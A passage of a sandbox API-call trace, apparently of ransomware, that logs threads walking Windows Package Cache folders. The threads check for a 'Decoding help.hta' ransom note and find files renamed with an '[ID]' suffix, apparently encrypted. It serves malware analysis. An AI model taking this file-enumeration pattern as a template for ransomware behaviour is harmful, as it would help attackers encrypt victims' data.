(lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned 79 [0042.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" [0042.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\decoding help.hta")) returned 0x1 [0042.985] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0042.985] lstrlenW (lpString="vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned 41 [0042.985] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0042.985] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xe9cfd30 | out: lpFindFileData=0xe9cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VCREDI~1._ID")) returned 0 [0042.985] FindClose (in: hFindFile=0x6718b0 | out: hFindFile=0x6718b0) returned 1 Thread: id = 345 os_tid = 0x50c [0042.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*", lpFindFileData=0x16adfd30 | out: lpFindFileData=0x16adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0042.994] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.994] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x16adfd30 | out: lpFindFileData=0x16adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.994] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.994] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.994] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x16adfd30 | out: lpFindFileData=0x16adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.994] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.994] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.995] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.995] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*" [0042.995] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*") returned 90 [0042.995] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0042.995] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*" [0042.995] GlobalMemoryStatus (in: lpBuffer=0x16adfd10 | out: lpBuffer=0x16adfd10) [0042.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x985a718, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.044] CloseHandle (hObject=0x708) returned 1 [0043.044] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x16adfd30 | out: lpFindFileData=0x16adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.045] FindClose (in: hFindFile=0x671a70 | out: hFindFile=0x671a70) returned 1 Thread: id = 346 os_tid = 0xb0 [0043.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*", lpFindFileData=0x16bdfd30 | out: lpFindFileData=0x16bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x22b86730, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22b86730, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b70 [0043.008] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.008] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x16bdfd30 | out: lpFindFileData=0x16bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x22b86730, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22b86730, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.008] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.008] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.008] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x16bdfd30 | out: lpFindFileData=0x16bdfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x22520c10, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x22520c10, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x225df2f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0043.008] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0043.008] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned 79 [0043.008] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" [0043.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\decoding help.hta")) returned 0x1 [0043.009] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0043.009] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x16bdfd30 | out: lpFindFileData=0x16bdfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x1a127460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x22b86730, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x89a, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="STATER~1._ID")) returned 1 [0043.009] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0043.009] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned 79 [0043.009] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" [0043.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\decoding help.hta")) returned 0x1 [0043.009] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0043.009] lstrlenW (lpString="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned 34 [0043.009] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0043.009] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x16bdfd30 | out: lpFindFileData=0x16bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VCREDI~1._ID")) returned 1 [0043.009] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0043.009] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned 79 [0043.009] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" [0043.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\decoding help.hta")) returned 0x1 [0043.009] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0043.009] lstrlenW (lpString="vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned 41 [0043.009] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0043.009] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x16bdfd30 | out: lpFindFileData=0x16bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VCREDI~1._ID")) returned 0 [0043.009] FindClose (in: hFindFile=0x671b70 | out: hFindFile=0x671b70) returned 1 Thread: id = 347 os_tid = 0xa0c [0043.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*", lpFindFileData=0x16cdfd30 | out: lpFindFileData=0x16cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b70 [0043.022] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.022] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x16cdfd30 | out: lpFindFileData=0x16cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.022] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.022] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.022] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x16cdfd30 | out: lpFindFileData=0x16cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.022] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.022] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.022] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*" [0043.023] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*") returned 91 [0043.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0043.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*" [0043.023] GlobalMemoryStatus (in: lpBuffer=0x16cdfd10 | out: lpBuffer=0x16cdfd10) [0043.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e7f038, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x718 [0043.044] CloseHandle (hObject=0x718) returned 1 [0043.044] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x16cdfd30 | out: lpFindFileData=0x16cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.044] FindClose (in: hFindFile=0x671b70 | out: hFindFile=0x671b70) returned 1 Thread: id = 348 os_tid = 0xa38 [0043.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*", lpFindFileData=0x16ddfd30 | out: lpFindFileData=0x16ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ab0 [0043.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.042] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x16ddfd30 | out: lpFindFileData=0x16ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.042] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.042] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x16ddfd30 | out: lpFindFileData=0x16ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.042] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.042] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.042] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.043] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*" [0043.043] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*") returned 91 [0043.043] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0043.043] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*" [0043.043] GlobalMemoryStatus (in: lpBuffer=0x16ddfd10 | out: lpBuffer=0x16ddfd10) [0043.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d56b50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.051] CloseHandle (hObject=0x6a0) returned 1 [0043.051] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x16ddfd30 | out: lpFindFileData=0x16ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.051] FindClose (in: hFindFile=0x671ab0 | out: hFindFile=0x671ab0) returned 1 Thread: id = 349 os_tid = 0xa54 [0043.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*", lpFindFileData=0x16f1fd30 | out: lpFindFileData=0x16f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0043.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.049] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x16f1fd30 | out: lpFindFileData=0x16f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.049] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.049] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x16f1fd30 | out: lpFindFileData=0x16f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.049] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.049] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.049] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.049] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*" [0043.049] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package 